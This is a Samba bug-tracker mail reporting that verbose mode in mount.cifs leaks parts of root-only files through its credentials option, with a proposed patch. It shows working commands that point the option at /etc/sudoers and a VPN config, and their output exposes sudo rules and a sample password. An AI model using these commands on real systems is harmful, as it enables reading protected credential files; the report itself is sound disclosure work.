[Bug 15026] New: Partial arbitrary file read via mount.cifs

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



https://bugzilla.samba.org/show_bug.cgi?id=15026

            Bug ID: 15026
           Summary: Partial arbitrary file read via mount.cifs
           Product: CifsVFS
           Version: 5.x
          Hardware: All
                OS: All
            Status: NEW
          Severity: normal
          Priority: P5
         Component: user space tools
          Assignee: jlayton@xxxxxxxxx
          Reporter: jbe@xxxxxxxxxxxx
        QA Contact: cifs-qa@xxxxxxxxx
                CC: sfrench@xxxxxxxxx
  Target Milestone: ---

Partial arbitrary file read via mount.cifs

The following was tested on cifs-utils version 6.14.

The "credentials" option of mount.cifs binary allow for partial arbitrary file
disclosure when the verbose flag is set. When a credential line is invalid, the
following code is reached:

 571 static int open_cred_file(char *file_name,
 572                         struct parsed_mount_info *parsed_info)
 573 {
 ...
 637                 case CRED_UNPARSEABLE:
 638                         if (parsed_info->verboseflag)
 639                                 fprintf(stderr, "Credential formatted "
 640                                         "incorrectly: %s\n",
 641                                         temp_val ? temp_val : "(null)");

Because of how credential files are formatted, any part of a line after an
equal sign in an invalid line is printed. Such lines can be found in sensitive
files:

secure_path and rights in /etc/sudoers:

$ ls -l /etc/sudoers
-r--r----- 1 root root 670 Apr 20  2021 /etc/sudoers

$ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o
credentials=/etc/sudoers
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly:
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (ALL:ALL) ALL
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (ALL:ALL) ALL
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Password for root@//127.0.0.1/share: 
mount.cifs kernel mount options:
ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=********
mount error(111): could not connect to 127.0.0.1Unable to find suitable
address.

Passwords in /etc/openfortivpn/config:

$ ls -l /etc/openfortivpn/config
-rw------- 1 root root 154 Aug 28  2021 /etc/openfortivpn/config

$ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o
credentials=/etc/openfortivpn/config
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly:  vpn.example.org
Credential formatted incorrectly:  443
Credential formatted incorrectly:  vpnuser
Credential formatted incorrectly:  VPNpassw0rd
Password for root@//127.0.0.1/share: 
mount.cifs kernel mount options:
ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=********
mount error(111): could not connect to 127.0.0.1Unable to find suitable
address.

Note that either sudo rights on the mount.cifs binary or an entry in fstab are
needed to perform the read.

A possible mitigation is to get rid of the token value when printing the error
in verbose mode:

From: Jeffrey Bencteux <jbe@xxxxxxxxxxxx>
Date: Sat, 19 Mar 2022 13:41:15 -0400
Subject: [PATCH] fix verbose message of credentials option

When supposed credential line is invalid, the verbose message prints
 part of it. This lead to information disclosure when the
 credentials file given is sensitive and contains '=' signs.

Signed-off-by: Jeffrey Bencteux <jbe@xxxxxxxxxxxx>
---
 mount.cifs.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/mount.cifs.c b/mount.cifs.c
index 32521a7..82358a3 100644
--- a/mount.cifs.c
+++ b/mount.cifs.c
@@ -637,8 +637,7 @@ static int open_cred_file(char *file_name,
                case CRED_UNPARSEABLE:
                        if (parsed_info->verboseflag)
                                fprintf(stderr, "Credential formatted "
-                                       "incorrectly: %s\n",
-                                       temp_val ? temp_val : "(null)");
+                                       "incorrectly\n");
                        break;
                }
        }
-- 
2.33.0

-- 
You are receiving this mail because:
You are the QA Contact for the bug.



[Linux USB Devel]     [Video for Linux]     [Linux Audio Users]     [Yosemite News]     [Linux Kernel]     [Linux SCSI]

  Powered by Linux